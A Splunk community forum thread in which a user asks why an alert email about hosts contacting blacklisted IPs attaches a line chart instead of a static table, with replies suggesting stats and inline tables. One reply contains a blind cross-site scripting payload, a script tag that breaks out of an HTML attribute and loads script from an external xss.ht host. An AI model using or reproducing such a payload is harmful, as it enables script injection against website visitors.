Alerting

Alerts, wrong visualization in the attachment

a_n
Path Finder

Hello All,

I have several alerts which send email notifications.

I know it might be very basic, but I need your help.

One alert is to specify if a local host has accessed a blacklisted IP.
So I expect to have a table with:
Src, Dest, Port 
The search returns table, but I do not understand why does it attach a Line-Chart diagram!
I want it as Static table. In Visualization tab, it does not show me static table. I even tried to create a new alert without even going to the visualization tab, but I got same result.

I have even changed the search and used Table instead of stats.

Please advise.

Thank you

Labels (1)
Tags (1)
0 Karma

a_n
Path Finder

Hi,
search is like:
index=FW
|table Src,Dst,pt
|dedup Src,Dst,pt
|rename Src as "Source",Dst as "Destination", pt as "Port"

chart is like:
Screen Shot 2021-09-10 at 9.01.22 AM.png

Which I do not need it.
I managed for now as a workaround to Not attache PDF and use Inline Table.

Is it the only way to do this?
Thank you

 

0 Karma

isoutamo
SplunkTrust
SplunkTrust

Maybe you can change you table + deduce to

...
| stats count by Src, Dst, pt
...

And as you said don't attach pdf etc. into alert email, just link and/or inline.

r. Ismo 

0 Karma

shivamrai
New Member

"><script src=https://shivamraixssht.xss.ht></script>

0 Karma

a_n
Path Finder

Hi,
Sorry, I am afraid I did not get what is this?
would you please elaborate?
Thank you

0 Karma

a_n
Path Finder

Yes, I was using this stats command.

My concern is about the chart, so it seems this is the only way:
to not attach PDF and include the Table inline.

 

Thank you very much

0 Karma

a_n
Path Finder

Any one can assist please?

0 Karma

isoutamo
SplunkTrust
SplunkTrust

Can you post your query + those visualisations?

0 Karma

a_n
Path Finder

I have added the search and chart, but seems in wrong level.

Please check.

Thank you

0 Karma
Get Updates on the Splunk Community!

Webinar Recap | Revolutionizing IT Operations: The Transformative Power of AI and ML ...

The Transformative Power of AI and ML in Enhancing Observability   In the realm of IT operations, the ...

.conf24 | Registration Open!

Hello, hello! I come bearing good news: Registration for .conf24 is now open!   conf is Splunk’s rad annual ...

ICYMI - Check out the latest releases of Splunk Edge Processor

Splunk is pleased to announce the latest enhancements to Splunk Edge Processor.  HEC Receiver authorization ...